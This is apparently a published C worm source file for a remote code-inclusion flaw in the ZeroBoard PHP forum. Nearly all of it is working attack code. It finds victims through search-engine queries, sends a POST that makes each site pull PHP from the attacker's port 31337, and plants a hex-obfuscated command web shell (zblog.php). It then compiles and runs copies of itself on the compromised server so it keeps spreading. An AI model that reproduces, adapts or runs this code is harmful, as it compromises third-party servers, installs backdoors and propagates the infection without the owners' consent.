  1. /*
  2. The worm exploits a vulnerability in ZeroBoard, allowing an attacker to inject arbitrary PHP code.
  3.  
  4. /str0ke
  5. */
  6.  
  7. /*
  8. ** ZeroBoard -1day INE w0rm
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <unistd.h>
  13. #include <stdlib.h>
  14. #include <sys/socket.h>
  15. #include <netdb.h>
  16. #include <netinet/in.h>
  17. #include <signal.h>
  18. #include <sys/ioctl.h>
  19. #include <net/if.h>
  20. #ifdef __sun__
  21. #include <sys/sockio.h>
  22. #endif /* __SunOS__ */
  23.  
  24. #define DEBUG_ING
  25. #undef DEBUG_ING
  26.  
  27. #define TMP_FILE "./tmp.core"
  28. #define CMD_FILE "./cmd.core"
  29. #define PRC_FILE "./proc.core"
  30. #define SCS (0)
  31. #define MIN (1)
  32.  
  33. #ifdef __linux__
  34. #define DEF_ETH "eth0"
  35. #else
  36. #ifdef __FreeBSD__
  37. #define DEF_ETH "ed0"
  38. #else
  39. #ifdef __sun__
  40. #define DEF_ETH "hme0"
  41. #endif
  42. #endif
  43. #endif
  44.  
  45. #define MAX_BUF (0x0000ffff)
  46. #define FIR_BUF (0x00000800)
  47. #define SEC_BUF (0x00000400)
  48. #define THR_BUF (0x00000200)
  49. #define MIN_BUF (0x00000100)
  50.  
  51. #define VENDOR "nzeo.com"
  52.  
  53. // search rule
  54. #define FD_RULE_0 "/zboard/zboard.php"
  55. #define FD_RULE_1 "/zb41/zboard.php"
  56. #define FD_RULE_2 "/bbs/zboard.php"
  57. #define FD_RULE_3 "/zb/zboard.php"
  58. #define FD_RULE_4 "/zb40/zboard.php"
  59. #define FD_RULE_5 "/board/zboard.php"
  60. #define FD_RULE_6 "zboard.php"
  61. #define FD_RULE_7 "zboard.ph"
  62.  
  63. // pattern
  64. #define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
  65. #define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
  66. #define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
  67. #define FD_PATH_3 "/zb/skin/zero_vote/login.php"
  68. #define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
  69. #define FD_PATH_5 "/board/skin/zero_vote/login.php"
  70. #define FD_PATH_6 "/skin/zero_vote/login.php"
  71.  
  72. #define RESULT_OK "200 OK"
  73. #define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
  74. #define MAKE_STR2 "ZBCODE MAKE SUCCESS"
  75. #define DELT_STR1 "BACKDOOR DELETE SUCCESS"
  76. #define DELT_STR2 "ZBCODE DELETE SUCCESS"
  77.  
  78. #define DEF_PORT (31337)
  79. #define CONN_PORT (80)
  80. #define DEF_TIME (20)
  81.  
  82. int set_sock(char *sc_gt_host,int port,int type);
  83. void re_connt_lm(int st_sock_va,int type);
  84. int proc_r();
  85. void t_kill();
  86. void sf_exit();
  87. int g_ip(char *ip);
  88. int make_cmd_file();
  89. int filter_f(char *test_bf,int tnum);
  90.  
  91. int sock;
  92.  
  93. struct tg_rl
  94. {
  95.  int r_num;
  96.  char *r_str;
  97.  char *url_str;
  98. };
  99.  
  100. #define TARGET_NUM (7)
  101. #define SEARCH_NUM (4)
  102.  
  103. struct tg_rl __tg_rule_va[]=
  104. {
  105.  {0,FD_RULE_0,FD_PATH_0},
  106.  {1,FD_RULE_1,FD_PATH_1},
  107.  {2,FD_RULE_2,FD_PATH_2},
  108.  {3,FD_RULE_3,FD_PATH_3},
  109.  {4,FD_RULE_4,FD_PATH_4},
  110.  {5,FD_RULE_5,FD_PATH_5},
  111.  {6,FD_RULE_6,FD_PATH_6},
  112.  {7,FD_RULE_7,FD_PATH_6},
  113.  {8,NULL,NULL}
  114. };
  115.  
  116. struct search_rule
  117. {
  118.  int num;
  119.  u_char *url;
  120.  int maxnum;
  121.  int defnum;
  122.  u_char *http_head;
  123. };
  124.  
  125. struct search_rule search_va[]=
  126. {
  127.  {0,"www.google.com",990,10,"http://"},
  128.  {1,"kr.search.yahoo.com",990,15,"http://"},
  129.  {2,"search.nate.com",480,10,"http://"},
  130.  {3,"search.lycos.com",990,10,"//"},
  131.  {4,"kr.altavista.com",1000,10,"//"},
  132.  {5,NULL,0,0,NULL}
  133. };
  134.  
  135. void t_kill()
  136. {
  137. #ifdef DEBUG_ING
  138.  fprintf(stdout,"time out\n");
  139. #endif
  140.  close(sock);
  141.  sock=-1;
  142.  signal(SIGALRM,SIG_DFL);
  143.  return;
  144. }
  145.  
  146. void sf_exit()
  147. {
  148. #ifdef DEBUG_ING
  149.  fprintf(stdout,"safe exit\n");
  150. #endif
  151.  close(sock);
  152.  kill((int)proc_r(),9);
  153.  unlink(TMP_FILE);
  154.  unlink(CMD_FILE);
  155.  unlink(PRC_FILE);
  156.  exit(-1);
  157. }
  158.  
  159. int main(int argc,char *argv[])
  160. {
  161.  FILE *fp;
  162.  
  163.  int tnum=(SCS);
  164.  int chk=(SCS);
  165.  int gogo=(SCS);
  166.  int whgl=(SCS);
  167.  int qnum=(SCS);
  168.  int tgrl_sl=(MIN);
  169.  int _conn_num=(SCS);
  170.  int port=(CONN_PORT);
  171.  int def_port=(DEF_PORT);
  172.  int sc_gt_sock;
  173.  int host_chk=(SCS);
  174.  
  175.  u_char *gg_ptr=NULL;
  176.  u_char *t_ptr=NULL;
  177.  u_char __zr_bf[(MAX_BUF)];
  178.  u_char *port_ptr=NULL;
  179.  
  180.  char pkt[(FIR_BUF)];
  181.  char host[(SEC_BUF)];
  182.  char url[(SEC_BUF)];
  183.  char test_bf[(MAX_BUF)];
  184.  char req_t_bf[(THR_BUF)];
  185.  char ip[(MIN_BUF)];
  186.  char atk_code[(MIN_BUF)];
  187.  
  188.  signal(SIGINT,sf_exit);
  189.  signal(SIGTSTP,sf_exit);
  190.  
  191.  while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
  192.  {
  193.   extern char *optarg;
  194.   switch(whgl)
  195.   {
  196.    case 'S':
  197.    case 's':
  198.     tnum=atoi(optarg);
  199.     if(SEARCH_NUM<tnum)
  200.     {
  201.      fprintf(stderr,"target error\n");
  202.      exit(-1);
  203.     }
  204.     break;
  205.  
  206.    case 'T':
  207.    case 't':
  208.     tgrl_sl=atoi(optarg);
  209.     if(TARGET_NUM<tgrl_sl)
  210.     {
  211.      fprintf(stderr,"target error\n");
  212.      exit(-1);
  213.     }
  214.     break;
  215.  
  216.    case 'Q':
  217.    case 'q':
  218.     qnum=atoi(optarg);
  219.     break;
  220.      
  221.    case 'P':
  222.    case 'p':
  223.     def_port=atoi(optarg);
  224.     break;
  225.      
  226.    case 'H':
  227.    case 'h':
  228.     memset((char *)host,0,sizeof(host));
  229.     strncpy(host,optarg,sizeof(host)-1);
  230.     host_chk++;
  231.     break;
  232.      
  233.    case 'U':
  234.    case 'u':
  235.     memset((char *)url,0,sizeof(url));
  236.     strncpy(url,optarg,sizeof(url)-1);
  237.     host_chk++;
  238.     break;
  239.      
  240.    default:
  241.     exit(-1);
  242.   }
  243.  }
  244.  
  245.  (int)make_cmd_file();
  246.  
  247.  if(fork()==0)
  248.  {
  249.   signal(SIGALRM,SIG_IGN);
  250.   for(whgl=0;whgl<argc;whgl++)
  251.   {
  252.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
  253.   }
  254.   strcpy(argv[0],"receive mode process");
  255.   if((fp=fopen(PRC_FILE,"w"))==NULL)
  256.   {
  257.    sf_exit();
  258.   }
  259.   fprintf(fp,"%d\n",getpid());
  260.   fclose(fp);
  261.   sc_gt_sock=(int)set_sock(NULL,def_port,1);
  262.   (void)re_connt_lm(sc_gt_sock,0);
  263.  }
  264.  else
  265.  {
  266.   for(whgl=0;whgl<argc;whgl++)
  267.   {
  268.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
  269.   }
  270.   strcpy(argv[0],"scanning mode process");
  271.  
  272.   switch(host_chk)
  273.   {
  274.    case 1:
  275. #ifdef DEBUG_ING
  276.     fprintf(stdout,"argument error\n");
  277. #endif
  278.     sf_exit();
  279.     break;
  280.      
  281.    case 2:
  282.     goto ok;
  283.     break;
  284.   }
  285.  
  286. #ifdef DEBUG_ING
  287.   fprintf(stdout,"search url: %s\n",search_va[tnum].url);
  288. #endif
  289.   for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
  290.   {
  291. conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
  292.    {
  293.     goto conn;
  294.    }
  295.  
  296.    memset((char *)req_t_bf,0,sizeof(req_t_bf));
  297.    switch(search_va[tnum].num)
  298.    {
  299.     case 0:
  300.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  301.       "GET /search?q=%s"
  302.       "&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
  303.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  304.      break;
  305.     case 1:
  306.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  307.       "GET /search/web?p=%s&b=%d "
  308.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  309.      break;
  310.     case 2:
  311.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  312.       "GET /webpage/search.asp?query=%s&start=%d "
  313.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  314.      break;
  315.     case 3:
  316.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  317.       "GET /default.asp?query=%s&first=%d&pmore=more "
  318.       "HTTP/1.0\r\n"
  319.       "Accept-Language: ko\r\n"
  320.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
  321.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
  322.      break;
  323.     case 4:
  324.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  325.       "GET /web/results?itag=wrx&q=%s&stq=%d "
  326.       "HTTP/1.0\r\n"
  327.       "Accept-Language: ko\r\n"
  328.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
  329.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
  330.      break;
  331.    }
  332.    send(sock,req_t_bf,strlen(req_t_bf),0);
  333.    whgl=(SCS);
  334.  
  335.    if((fp=fopen(TMP_FILE,"w"))==NULL)
  336.    {
  337.     return(-1);
  338.    }
  339.    signal(SIGALRM,SIG_IGN);
  340.    alarm(MAX_BUF);
  341.    
  342.    memset((char *)test_bf,0,sizeof(test_bf));
  343.    while(recv(sock,test_bf,sizeof(test_bf)-1,0))
  344.    {
  345.     fprintf(fp,"%s",test_bf);
  346.     memset((char *)test_bf,0,sizeof(test_bf));
  347.    }
  348.    fclose(fp);
  349.    close(sock);
  350.  
  351.    if((fp=fopen(TMP_FILE,"r"))==NULL)
  352.    {
  353.     return(-1);
  354.    }
  355.  
  356.    while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
  357.    {
  358.     gg_ptr=__zr_bf;
  359.  
  360.     while(MIN)
  361.     {
  362.      t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
  363.      gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  364.  
  365.      if(t_ptr!=NULL)
  366.      {
  367.       memset((char *)test_bf,0,sizeof(test_bf));
  368.       whgl=(SCS);
  369.       chk=(SCS);
  370.  
  371.       for(gogo=0;gogo<strlen(t_ptr);gogo++)
  372.       {
  373.        if(chk)
  374.        {
  375.         if(t_ptr[gogo]=='>')
  376.          chk=0;
  377.        }
  378.        else {
  379.         if(t_ptr[gogo]==' ')
  380.          continue;
  381.         else if(t_ptr[gogo]=='<')
  382.          chk=1;
  383.         else test_bf[whgl++]=t_ptr[gogo];
  384.        }
  385.       }
  386.  
  387.       if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
  388.        continue;
  389.       else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);
  390.  
  391.       if(t_ptr!=NULL)
  392.        t_ptr[0]='\0';
  393.       else continue;
  394.  
  395.       if(filter_f(test_bf,tnum))
  396.       {
  397.        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  398.        if(strstr(t_ptr,search_va[tnum].http_head))
  399.         continue;
  400.  
  401.        memset((char *)host,0,sizeof(host));
  402.        memset((char *)url,0,sizeof(url));
  403.  
  404.        chk=(SCS);
  405.  
  406.        if(strstr(test_bf,search_va[tnum].http_head))
  407.        {
  408.         t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  409.         port=(CONN_PORT);
  410.  
  411.         for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
  412.         {
  413.          if(t_ptr[whgl]=='/')
  414.          {
  415.           for(gogo=0;whgl<strlen(t_ptr);whgl++)
  416.            url[gogo++]=t_ptr[whgl];
  417.           strcat(url,__tg_rule_va[tgrl_sl].url_str);
  418.           break;
  419.          }
  420.          else if(t_ptr[whgl]=='\0')
  421.          {
  422.           strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
  423.           break;
  424.          }
  425.          else if(t_ptr[whgl]==':')
  426.          {
  427.           port_ptr=(char *)strstr(t_ptr,":")+1;
  428.           port=atoi(port_ptr);
  429.          }
  430.          else host[chk++]=t_ptr[whgl];
  431.         }
  432. #ifdef DEBUG_ING
  433.         fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%d\n",test_bf,url,host,port);
  434. #endif
  435. ok:
  436.         sock=set_sock(host,port,0);
  437.         if(sock==-1)
  438.          continue;
  439.         else {
  440.          memset((char *)ip,0,sizeof(ip));
  441.          memset((char *)atk_code,0,sizeof(atk_code));
  442.          memset((char *)pkt,0,sizeof(pkt));
  443.  
  444.          (int)g_ip(ip);
  445.          snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/\r\n",ip,def_port);
  446.          snprintf(pkt,sizeof(pkt)-1,
  447.           "POST http://%s%s HTTP/1.0\r\n"
  448.           "Content-Type: application/x-www-form-urlencoded\r\n"
  449.           "Content-Length: %d\r\n"
  450.           "Host: %s\r\n\r\n%s\r\n",host,url,strlen(atk_code),host,atk_code);
  451.          send(sock,pkt,strlen(pkt),0);
  452.          memset((char *)pkt,0,sizeof(pkt));
  453.          recv(sock,pkt,sizeof(pkt)-1,0);
  454. #ifdef DEBUG_ING
  455.          if(strstr(pkt,RESULT_OK))
  456.          {
  457.           if(strstr(pkt,MAKE_STR1))
  458.            fprintf(stdout,"%s\n",MAKE_STR1);
  459.           if(strstr(pkt,MAKE_STR2))
  460.            fprintf(stdout,"%s\n",MAKE_STR2);
  461.           if(strstr(pkt,DELT_STR1))
  462.            fprintf(stdout,"%s\n",DELT_STR1);
  463.           if(strstr(pkt,DELT_STR2))
  464.            fprintf(stdout,"%s\n",DELT_STR2);
  465.           printf("%s: %s\n",RESULT_OK,host);
  466.          }
  467. #endif
  468.         }
  469.         close(sock);
  470.  
  471.         if(host_chk)
  472.         {
  473.          sf_exit();
  474.         }
  475.        }
  476.       }
  477.      }
  478.      else break;
  479.     }
  480.     memset((char *)__zr_bf,0,sizeof(__zr_bf));
  481.    }
  482.    fclose(fp);
  483.    unlink(TMP_FILE);
  484.   }
  485.   sf_exit();
  486.  }
  487. }
  488.  
  489. int set_sock(char *sc_gt_host,int port,int type)
  490. {
  491.  struct sockaddr_in sock_st;
  492.  struct sockaddr_in t_st;
  493.  int nw_gt_sock,s_s;
  494.  struct hostent *hst_etr;
  495.  int sc_gt_sock;
  496.  int t_c=0;
  497.  char t_b[(SEC_BUF)];
  498.  FILE *fp;
  499.  char http_rq[]="HTTP/1.1 200 OK\r\n\r\n";
  500.  
  501.  if(!type){
  502.   signal(SIGALRM,t_kill);
  503.   alarm(DEF_TIME);
  504.  
  505.   if((hst_etr=gethostbyname(sc_gt_host))==NULL)
  506.   {
  507.    return(-1);
  508.   }
  509.   if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  510.   {
  511.    return(-1);
  512.   }
  513.   sock_st.sin_family=(AF_INET);
  514.   sock_st.sin_port=htons(port);
  515.   sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr);
  516.   memset(&(sock_st.sin_zero),0,8);
  517.  
  518.   if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  519.   {
  520.    close(sock);
  521.    return(-1);
  522.   }
  523.   return(sock);
  524.  }
  525.  else{
  526.   if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  527.   {
  528.    return(-1);
  529.   }
  530.  
  531.   sock_st.sin_family=(AF_INET);
  532.   sock_st.sin_port=htons(port);
  533.   sock_st.sin_addr.s_addr=(INADDR_ANY);
  534.   memset(&(sock_st.sin_zero),0,8);
  535.  
  536.   if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  537.   {
  538.    close(sc_gt_sock);
  539.    return(-1);
  540.   }
  541. #define BK_LG 10
  542.   if(listen(sc_gt_sock,(BK_LG))==-1){
  543.    close(sc_gt_sock);
  544.    return(-1);
  545.   }
  546.   while(1){
  547.    s_s=sizeof(struct sockaddr_in);
  548.    if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
  549.    {
  550.     close(nw_gt_sock);
  551.     close(sc_gt_sock);
  552.     return(-1);
  553.    }
  554.    while(recv(nw_gt_sock,&t_c,1,0)){
  555.     if(t_c==0x0d){
  556.      recv(nw_gt_sock,&t_c,1,0);
  557.      if(t_c==0x0a){
  558.       recv(nw_gt_sock,&t_c,1,0);
  559.       if(t_c==0x0d){
  560.        recv(nw_gt_sock,&t_c,1,0);
  561.        if(t_c==0x0a){
  562.         break;
  563.        }
  564.       }
  565.      }
  566.     }
  567.    }
  568.  
  569.    send(nw_gt_sock,http_rq,strlen(http_rq),0);
  570.    if((fp=fopen(CMD_FILE,"r"))==NULL){
  571.     close(nw_gt_sock);
  572.     close(sc_gt_sock);
  573.     return(-1);
  574.    }
  575.    memset((char *)t_b,0,sizeof(t_b));
  576.    while(fgets(t_b,sizeof(t_b)-1,fp)){
  577.     send(nw_gt_sock,t_b,strlen(t_b),0);
  578.    }
  579.    fclose(fp);
  580.    close(nw_gt_sock);
  581.    continue;
  582.   }
  583.   close(sc_gt_sock);
  584.   return(-1);
  585.  }
  586. }
  587.  
  588. void re_connt_lm(int st_sock_va,int type)
  589. {
  590.  if(st_sock_va==-1)
  591.  {
  592.   if(!type){
  593.    kill(getppid(),9); // parent
  594.   }
  595.   kill((int)proc_r(),9); // child
  596.   sf_exit();
  597.  }
  598. }
  599.  
  600. int proc_r(){
  601.  FILE *fp;
  602.  int proc_n;
  603.  if((fp=fopen(PRC_FILE,"r"))==NULL){
  604.   exit(-1); // child check.
  605.  }
  606.  fscanf(fp,"%16d",&proc_n);
  607.  fclose(fp);
  608.  return proc_n;
  609. }
  610.  
  611. int g_ip(char *ip)
  612. {
  613.  int sock;
  614.  struct ifreq ifpq;
  615.  struct sockaddr_in *pq;
  616.  
  617.  memset(&ifpq,0,sizeof(ifpq));
  618.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  619.  {
  620.   return(-1);
  621.  }
  622.  pq=(struct sockaddr_in *)&ifpq.ifr_addr;
  623.  pq->sin_family=AF_INET;
  624.  
  625.  memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
  626.  if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
  627.  {
  628.   memset((char *)ip,0,(MIN_BUF));
  629.   snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
  630.  }
  631.  return 0;
  632. }
  633.  
  634. #define BACKDOOR_PATH "zblog.php"
  635. #define CODE_PATH "zbcode"
  636. #define CODE_PATH_SRC "zbcode.c"
  637.  
  638. int make_cmd_file()
  639. {
  640.  unsigned long w1=0;
  641.  FILE *fp;
  642.  FILE *pf;
  643.  
  644.  if((fp=fopen(CMD_FILE,"w"))==NULL)
  645.  {
  646.   return(-1);
  647.  }
  648.  
  649.  fprintf(fp,"<?\n"
  650.   "chdir('../../');\n\n"
  651.   "if(($fp=fopen('%s','r'))!=NULL)\n"
  652.   "{\n"
  653.   "$pnum=fread($fp,32);\n"
  654.   "fclose($fp);\n"
  655.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  656.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  657.   "{\n"
  658.   "exit;\n"
  659.   "}\n"
  660.   "}\n\n"
  661.   "$cont=\"\\x3c\\x3f\\x0a\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x46\".\n"
  662.   "\"\\x4f\\x52\\x4d\\x20\\x41\\x43\\x54\\x49\\x4f\\x4e\\x3d\\x24\".\n"
  663.   "\"\\x50\\x48\\x50\\x5f\\x53\\x45\\x4c\\x46\\x20\\x4d\\x45\\x54\".\n"
  664.   "\"\\x48\\x4f\\x44\\x3d\\x50\\x4f\\x53\\x54\\x3e\\x27\\x3b\\x0a\".\n"
  665.   "\"\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x49\\x4e\\x50\\x55\".\n"
  666.   "\"\\x54\\x20\\x54\\x59\\x50\\x45\\x3d\\x48\\x49\\x44\\x44\\x45\".\n"
  667.   "\"\\x4e\\x20\\x4e\\x41\\x4d\\x45\\x3d\\x63\\x6d\\x64\\x20\\x56\".\n"
  668.   "\"\\x41\\x4c\\x55\\x45\\x3d\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
  669.   "\"\\x64\\x3e\\x3c\\x2f\\x46\\x4f\\x52\\x4d\\x3e\\x3c\\x50\\x52\".\n"
  670.   "\"\\x45\\x3e\\x27\\x3b\\x0a\\x09\\x24\\x63\\x6f\\x6d\\x6d\\x61\".\n"
  671.   "\"\\x6e\\x64\\x3d\\x73\\x74\\x72\\x5f\\x72\\x65\\x70\\x6c\\x61\".\n"
  672.   "\"\\x63\\x65\\x28\\x27\\x5c\\x5c\\x27\\x2c\\x27\\x27\\x2c\\x24\".\n"
  673.   "\"\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x29\\x3b\\x0a\\x09\\x65\".\n"
  674.   "\"\\x63\\x68\\x6f\\x20\\x60\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
  675.   "\"\\x64\\x60\\x3b\\x0a\\x3f\\x3e\\x0a\";\n\n"
  676.   "$fp=fopen('%s','w');\n"
  677.   "fputs($fp,$cont);\n"
  678.   "fclose($fp);\n\n",PRC_FILE,BACKDOOR_PATH);
  679.  
  680.  if((pf=fopen(CODE_PATH,"r"))==NULL)
  681.  {
  682.   return(-1);
  683.  }
  684.  
  685.  fprintf(fp,"$cont=\"");
  686.  while(fread(&w1,1,1,pf))
  687.  {
  688.   fprintf(fp,"\\x%02x",w1);
  689.  }
  690.  fclose(pf);
  691.  fprintf(fp,"\";\n\n");
  692.  
  693.  fprintf(fp,"$fp=fopen('%s','w');\n"
  694.   "fputs($fp,$cont);\n"
  695.   "fclose($fp);\n\n",CODE_PATH);
  696.  if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
  697.  {
  698.   return(-1);
  699.  }
  700.  fprintf(fp,"$cont=\"");
  701.  while(fread(&w1,1,1,pf))
  702.  {
  703.   fprintf(fp,"\\x%02x",w1);
  704.  }
  705.  fclose(pf);
  706.  fprintf(fp,"\";\n\n");
  707.  
  708.  fprintf(fp,"$fp=fopen('%s','w');\n"
  709.   "fputs($fp,$cont);\n"
  710.   "fclose($fp);\n\n",CODE_PATH_SRC);
  711.  fprintf(fp,"$RES=`gcc -o %s %s`;\n\n",CODE_PATH,CODE_PATH_SRC);
  712.  
  713.  fprintf(fp,"chmod('%s',0755);\n",CODE_PATH);
  714.  
  715.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",BACKDOOR_PATH);
  716.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR1);
  717.  fprintf(fp,"} fclose($fp);\n\n");
  718.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",CODE_PATH);
  719.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR2);
  720.  fprintf(fp,"} fclose($fp);\n\n");
  721.  
  722. #if 1
  723.  fprintf(fp,"$fnum=(rand()%%%d);\n",TARGET_NUM);
  724.  fprintf(fp,"$snum=(rand()%%%d);\n",SEARCH_NUM);
  725.  fprintf(fp,"$randnum=(rand()%400);\n");
  726.  
  727.  fprintf(fp,"while(1)\n{\n");
  728.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)\n"
  729.   "{\n"
  730.   "$pnum=fread($fp,32);\n"
  731.   "fclose($fp);\n"
  732.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  733.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  734.   "{\n"
  735.   "exit;\n"
  736.   "}\n"
  737.   "}\n\n",PRC_FILE);
  738.  
  739.  fprintf(fp,"$port=(rand()%%65500);\n");
  740.  fprintf(fp,"if($port>1024){\n");
  741.  fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH);
  742.  fprintf(fp,"}\n}\n");
  743. #else
  744.  fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH);
  745.  fprintf(fp,"unlink('%s');\n",CODE_PATH);
  746.  
  747.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
  748.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
  749.  fprintf(fp,"} else { fclose($fp);\n");
  750.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH);
  751.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
  752.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
  753.  fprintf(fp,"}\n}\n");
  754.  
  755.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
  756.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
  757.  fprintf(fp,"} else { fclose($fp);\n");
  758.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH);
  759.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
  760.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
  761.  fprintf(fp,"}\n}\n");
  762. #endif
  763.  fprintf(fp,"?>\n");
  764.  fclose(fp);
  765. }
  766.  
  767. int filter_f(char *test_bf,int tnum)
  768. {
  769.  switch(search_va[tnum].num)
  770.  {
  771.   case 0: /* google */
  772.    if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
  773.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  774.     &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
  775.     &&!strstr(test_bf,VENDOR))
  776.    {
  777.     return 1;
  778.    }
  779.    else return 0;
  780.    break;
  781.    
  782.   case 1: /* yahoo */
  783.    if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
  784.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  785.     &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
  786.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  787.    {
  788.     return 1;
  789.    }
  790.    else return 0;
  791.    break;
  792.    
  793.   case 2: /* nate */
  794.    if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
  795.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  796.     &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
  797.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  798.    {
  799.     return 1;
  800.    }
  801.    else return 0;
  802.    break;
  803.    
  804.   case 3: /* lycos */
  805.    if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
  806.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
  807.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  808.    {
  809.     return 1;
  810.    }
  811.    else return 0;
  812.    break;
  813.    
  814.   case 4: /* altavista */
  815.    if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
  816.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
  817.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  818.    {
  819.     return 1;
  820.    }
  821.    else return 0;
  822.    break;
  823.    
  824.   default:
  825.    return 0;
  826.    break;
  827.  }
  828.  return 0;
  829. }